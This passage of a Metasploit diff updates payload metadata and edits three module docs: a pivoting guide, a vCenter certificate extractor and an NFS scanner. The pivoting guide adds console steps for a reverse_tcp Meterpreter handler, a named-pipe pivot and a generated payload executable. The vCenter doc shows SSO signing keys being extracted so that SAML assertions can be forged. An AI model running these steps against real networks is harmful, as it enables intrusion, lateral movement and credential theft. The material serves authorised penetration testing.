-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid",
@@ -179172,7 +179495,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp",
@@ -179212,7 +179535,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4",
@@ -179248,7 +179571,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid",
@@ -179283,7 +179606,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell_bind_tcp",
@@ -179318,7 +179641,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp",
@@ -179354,7 +179677,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp",
@@ -179391,7 +179714,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid",
@@ -179428,7 +179751,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe",
@@ -179464,7 +179787,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp",
@@ -179505,7 +179828,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4",
@@ -179542,7 +179865,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid",
@@ -179579,7 +179902,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http",
@@ -179618,7 +179941,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https",
@@ -179654,7 +179977,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp",
@@ -179695,7 +180018,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4",
@@ -179732,7 +180055,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid",
@@ -179769,7 +180092,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp",
@@ -179806,7 +180129,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps",
@@ -186626,7 +186949,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-13 13:09:00 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "php/meterpreter_reverse_tcp",
@@ -187004,7 +187327,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_bind_tcp",
@@ -187038,7 +187361,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_http",
@@ -187072,7 +187395,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_https",
@@ -187106,7 +187429,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_tcp",
@@ -190003,7 +190326,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_named_pipe",
@@ -190039,7 +190362,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_tcp",
@@ -190075,7 +190398,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_http",
@@ -190111,7 +190434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_https",
@@ -190147,7 +190470,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -190183,7 +190506,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_tcp",
@@ -202118,7 +202441,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-03-22 10:24:25 +0000",
+    "mod_time": "2022-05-27 10:21:59 +0000",
    "path": "/modules/post/multi/manage/shell_to_meterpreter.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/shell_to_meterpreter",
@@ -203874,7 +204197,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-14 16:55:43 +0000",
+    "mod_time": "2022-06-23 18:43:18 +0000",
    "path": "/modules/post/windows/escalate/getsystem.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/getsystem",
@@ -203882,6 +204205,14 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "Named Pipe Impersonation",
+        "Token Duplication",
+        "RPCSS",
+        "PrintSpooler",
+        "EFSRPC",
+        "EfsPotato"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -1,4 +1,5 @@
-# Overview of Pivoting And Its Benefits
+## Overview
+
 Whilst in test environments one is often looking at flat networks that only have one subnet and one network environment, the reality is that when it comes to pentests that are attempting to compromise an entire company, you will often have to deal with multiple networks, often with switches or firewalls in-between that are intended to keep these networks separate from one another.

 In order for pivoting to work, you must have compromised a host that is connected to two or more networks. This usually means that the host has two or more network adapters, whether that be physical network adapters, virtual network adapters, or a combination of both.
@@ -7,11 +8,14 @@ Once you have compromised a host that has multiple network adapters you can then

 Now that we understand some of the background, lets see this in action a bit more by setting up a sample environment and walking through some of Metasploit's pivoting features.

-# A Quick Note Before Continuing
+## Supported Session Types
+
 Pivoting functionality is provided by all Meterpreter and SSH sessions that occur over TCP channels. Whilst Meterpreter is mentioned below, keep in mind that this would also work with an SSH session as well. We have just resorted to using Meterpreter for this example for demonstration purposes.

-# Testing Pivoting
-## Target Environment Setup
+## Testing Pivoting
+
+### Target Environment Setup
+
 - Kali Machine
 	- Internal: None
 	- External: 172.19.182.171
@@ -153,7 +157,7 @@ IPv4 Active Routing Table
 msf6 post(multi/manage/autoroute) >
 ```

-# Using the Pivot
+## Using the Pivot
 At this point we can now use the pivot with any Metasploit modules as shown below:

 ```
@@ -210,11 +214,80 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce)
 [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
 msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
 ```
-# Pivoting External Tools
-## portfwd
+
+## SMB Named Pipe Pivoting in Meterpreter
+
+The Windows Meterpreter payload supports lateral movement in a network through SMB Named Pipe Pivoting. No other Meterpreters/session types support this functionality.
+
+First open a Windows Meterpreter session to the pivot machine:
+
+```
+msf6 > use payload/windows/x64/meterpreter/reverse_tcp
+smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
+lhost => 172.19.182.171
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
+lport => 4578
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+
+[*] Started reverse TCP handler on 172.19.182.171:4578 
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
+[*] Meterpreter session 1 opened (172.19.182.171:4578 -> 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500
+```
+
+Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows
+[+] Successfully created pipe pivot.
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine.  Note there is no need to start a handler for the named pipe payload.
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
+
+Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   PIPEHOST  .                yes       Host of the pipe to connect to
+   PIPENAME  msf-pipe         yes       Name of the pipe to listen on
+
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
+pipehost => 169.254.16.221
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
+[*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe...
+```
+
+After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
+```
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
+
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN11\msfuser @ WIN11          172.19.182.171:4578 -> 172.19.185.34:49674 (172.19.185.34)
+  2         meterpreter x64/windows  WIN2019\msfuser @ WIN2019      Pivot via [172.19.182.171:4578 -> 172.19.185.34:49674]
+                                                                                 (169.254.204.110)
+
+```
+## Pivoting External Tools
+
+### portfwd
 *Note: This method is discouraged as you can only set up a mapping between a single port and another target host and port, so using the socks module below is encouraged where possible. Additionally this method has been depreciated for some time now.*

-### Local Port Forwarding
+#### Local Port Forwarding
 To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:

 ```
@@ -262,7 +335,7 @@ Connecting to 127.0.0.1:443... failed: Connection refused.

 Note that you may need to edit your `/etc/hosts` file to map IP addresses to given host names to allow things like redirects to redirect to the right hostname or IP address when using this method of pivoting.

-### Listing Port Forwards and Removing Entries
+#### Listing Port Forwards and Removing Entries
 Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.

 ```
@@ -275,7 +348,7 @@ No port forwards are currently active.
 meterpreter >
 ```

-### Remote Port Forwarding
+#### Remote Port Forwarding
 This scenario is a bit different than above. Whereas previously we were instructing the session to forward traffic from our host running Metasploit, through the session, and to a second target host, with reverse port forwarding the scenario is a bit different. In this case we are instructing the session to forward traffic from other hosts through the session, and to our host running Metasploit. This is useful for allowing other applications running within a target network to interact with local applications on the machine running Metasploit.

 To set up a reverse port forward, use `portfwd add -R` within a supported session and then specify the `-l`, `-L` and `-p` options. The `-l` option specifies the port to forward the traffic to, the `-L` option specifies the IP address to forward the traffic to, and the `-p` option specifies the port to listen on for traffic on the machine that we have a session on (whose session console we are currently interacting with).
@@ -0,0 +1,98 @@
+Grab certificates from the vCenter server vmdird or vmafd database files and adds them to loot.
+This module will accept files from a live vCenter appliance or from a vCenter appliance backup
+archive; either or both files can be supplied to the module depending on the situation. The module
+will extract the vCenter SSO IdP signing credential from the vmdir database, which can be used to
+create forged SAML assertions and access the SSO directory as an administrator. The vmafd service
+contains the vCenter certificate store which from which the module will attempt to extract all vmafd
+certificates that also have a corresponding private key. Portions of this module are based on
+information published by Zach Hanley at Horizon3:
+
+https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
+
+## Vulnerable Application
+This module is tested against the vCenter appliance but will probably work against Windows instances.
+It has been tested against files from vCenter appliance versions 6.5, 6.7, and 7.0. The module will
+work with files retrieved from a live vCenter system as well as files extracted from an unencrypted
+vCenter backup archive.
+
+## Verification Steps
+You must possess the vmdir and/or vmafd database files from vCenter in order to use this module. The
+files must be local to the system invoking the module. Where possible, you should provide the
+`VC_IP` option to tag relevant loot entries with the IPv4 address of the originating system. If no
+value is provided for `VC_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
+
+1. Acquire the vmdir and/or vmafd database files from vCenter (see below)
+2. Start msfconsole
+3. Do: `use auxiliary/admin/vmware/vcenter_offline_mdb_extract`
+4. Do: `set vmdir_mdb <path to data.mdb>` if you are extracting from the vmdir database
+5. Do: `set vmafd_db <path to afd.db>` if you are extracting from the vmafd database
+6. Do: `set vc_ip <vCenter IPv4>` to attach the target vCenter IPv4 address to loot entries
+7. Do: `dump`
+
+## Options
+**VMDIR_MDB**
+
+Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`
+
+**VMAFD_DB**
+
+Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`
+
+**VC_IP**
+
+Optional parameter to set the IPv4 address associated with loot entries made by the module.
+
+## Scenarios
+
+### Acquire Database Files
+This module targets the internal databases of vCenter vmdir (OpenLDAP Memory-Mapped Database) and
+vmafd (SQLite3). On a live vCenter appliance, these files can be downloaded with root access from
+the following locations:
+
+`vmdir: /storage/db/vmware-vmdir/data.mdb`
+`vmafd: /storage/db/vmware-vmafd/afd.db`
+    
+If you are extracting from a backup file, target files are available in the following archives:
+
+`vmdir: lotus_backup.tar.gz`
+`vmafd: config_files.tar.gz`
+
+### Running the Module
+Example run against database files extracted from vCenter appliance version 7.0 Update 3d:
+
+```
+msf6 > use auxiliary/admin/vmware/vcenter_offline_mdb_extract
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmdir_mdb /tmp/data.mdb
+vmdir_mdb => /tmp/data.mdb
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmafd_db /tmp/afd.db
+vmafd_db => /tmp/afd.db
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vc_ip 192.168.100.70
+vc_ip => 192.168.100.70
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > dump
+
+[*] Extracting vmwSTSTenantCredential from /tmp/data.mdb ...
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_571080.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_564729.pem
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_vmca_721819.pem
+[*] Extracting vSphere platform certificates from /tmp/afd.db ...
+[+] __MACHINE_CERT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_869237.key
+[+] __MACHINE_CERT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_240839.pem
+[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_350586.key
+[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_106169.pem
+[+] HVC key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_825963.key
+[+] HVC cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_399928.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_995574.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_156797.pem
+[+] SMS_SELF_SIGNED key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_169524.key
+[+] SMS_SELF_SIGNED cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_230704.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_370336.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_300599.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_571196.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_088742.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_060718.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_280013.pem
+[+] WCP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_057402.key
+[+] WCP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_909204.pem
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > 
+```
@@ -1,65 +1,102 @@
 ## Vulnerable Application

-NFS is very common, and this scanner searches for a mis-configuration, not a vulnerable software version.  Installation instructions for NFS can be found for every operating system.
-The [Ubuntu 14.04](https://help.ubuntu.com/14.04/serverguide/network-file-system.html) instructions can be used as an example for installing and configuring NFS.  The
+NFS is very common, and this scanner searches for a mis-configuration, not a vulnerable software version.
+Installation instructions for NFS can be found for every operating system.
+The [Ubuntu](https://ubuntu.com/server/docs/service-nfs)
+instructions can be used as an example for installing and configuring NFS.  The
 following was done on Kali linux:
-  
-  1. `apt-get install nfs-kernel-server`
-  2. Create 2 folders to share:
-    ```
-    mkdir /tmp/open_share
-    mkdir /tmp/closed_share
-    ```
-  3. Add them to the list of shares:
-  ```
-  echo "/tmp/closed_share  10.1.2.3(ro,sync,no_root_squash)" >> /etc/exports
-  echo "/tmp/open_share    *(rw,sync,no_root_squash)" >> /etc/exports
-  ```
-  4. Restart the service: `service nfs-kernel-server restart`

-In this scenario, `closed_share` is set to read only, and only mountable by the IP 10.1.2.3.  `open_share` is mountable by anyone (`*`) in read/write mode.
+1. `apt-get install nfs-kernel-server`
+2. Create folders to share and add them to exports (adjust 192.168.1.x as needed):
+```
+mkdir /tmp/star
+echo "/tmp/star    *(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/not_us_hostname
+echo "/tmp/not_us_hostname    foo(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/us_hostname
+echo "/tmp/us_hostname    bar(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/not_us_ip
+echo "/tmp/not_us_ip    1.1.1.1(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/us_ip
+echo "/tmp/us_ip    192.168.1.111(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/not_us_subnet
+echo "/tmp/not_us_subnet    1.1.1.1/24(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/us_subnet
+echo "/tmp/us_subnet    192.168.1.1/24(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/not_us_netmask
+echo "/tmp/not_us_netmask    1.1.1.1/255.255.255.0(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/us_netmask
+echo "/tmp/us_netmask    192.168.1.1/255.255.255.0(rw,no_subtree_check)" >> /etc/exports
+mkdir /tmp/empty
+echo "/tmp/empty    (rw,no_subtree_check)" >> /etc/exports
+```
+3. Restart the service: `service nfs-kernel-server restart`
+
+## Options
+
+### PROTOCOL
+Which networking protocol to use. Options are `udp` and `tcp`. Defaults to `udp`.
+
+### LHOST
+IP to match shares against if `Mountable` is true. Defaults to the detected local IP address.
+
+### HOSTNAME
+Hostname to match shares against if `Mountable` is true. Defaults to `` (empty string)
+
+## Advanced Options
+
+### Mountable
+
+Determine if an export is mountable based on `LHOST` and `HOSTNAME`. Defaults to `true`. Pre 2022 behavior was `false`

 ## Verification Steps

-  1. Install and configure NFS
-  2. Start msfconsole
-  3. Do: `use auxiliary/scanner/nfs/nfsmount`
-  4. Do: `run`
+1. Install and configure NFS
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/nfs/nfsmount`
+4. Do: `run`

 ## Scenarios

-  A run against the configuration from these docs
+A run against the configuration from these docs

-  ```
-    msf > use auxiliary/scanner/nfs/nfsmount
-    msf auxiliary(nfsmount) > set rhosts 127.0.0.1
-    rhosts => 127.0.0.1
-    msf auxiliary(nfsmount) > run
-    
-    [+] 127.0.0.1:111         - 127.0.0.1 NFS Export: /tmp/open_share [*]
-    [+] 127.0.0.1:111         - 127.0.0.1 NFS Export: /tmp/closed_share [10.1.2.3]
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-  ```
-  
-  Another example can be found at this [source](http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/):
-  
-  ```
-    [*] Scanned  24 of 240 hosts (10% complete)
-    [+] 10.10.xx.xx NFS Export: /data/iso [0.0.0.0/0.0.0.0]
-    [*] Scanned  48 of 240 hosts (20% complete)
-    [+] 10.10.xx.xx NFS Export: /DataVolume/Public [*]
-    [+] 10.10.xx.xx NFS Export: /DataVolume/Download [*]
-    [+] 10.10.xx.xx NFS Export: /DataVolume/Softshare [*]
-    [*] Scanned  72 of 240 hosts (30% complete)
-    [+] 10.10.xx.xx NFS Export: /var/ftp/pub [10.0.0.0/255.255.255.0]
-    [*] Scanned  96 of 240 hosts (40% complete)
-    [+] 10.10.xx.xx NFS Export: /common []
-  ```
+```
+msf > use auxiliary/scanner/nfs/nfsmount
+msf auxiliary(nfsmount) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf auxiliary(nfsmount) > run
+
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/empty [*]
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/star [*]
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/us_netmask [10.1.1.1/255.255.255.0]
+[*] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/not_us_netmask [1.1.1.1/255.255.255.0]
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/us_subnet [10.1.1.1/24]
+[*] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/not_us_subnet [1.1.1.1/24]
+[+] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/us_ip [192.168.1.111]
+[*] 127.0.0.1:111       - 127.0.0.1 NFS Export: /tmp/not_us_ip [1.1.1.1]
+[*] 127.0.0.1:111       - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Another example can be found at this [source](http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/):
+
+```
+[*] Scanned  24 of 240 hosts (10% complete)
+[+] 10.10.xx.xx NFS Export: /data/iso [0.0.0.0/0.0.0.0]
+[*] Scanned  48 of 240 hosts (20% complete)
+[+] 10.10.xx.xx NFS Export: /DataVolume/Public [*]
+[+] 10.10.xx.xx NFS Export: /DataVolume/Download [*]
+[+] 10.10.xx.xx NFS Export: /DataVolume/Softshare [*]
+[*] Scanned  72 of 240 hosts (30% complete)
+[+] 10.10.xx.xx NFS Export: /var/ftp/pub [10.0.0.0/255.255.255.0]
+[*] Scanned  96 of 240 hosts (40% complete)
+[+] 10.10.xx.xx NFS Export: /common []
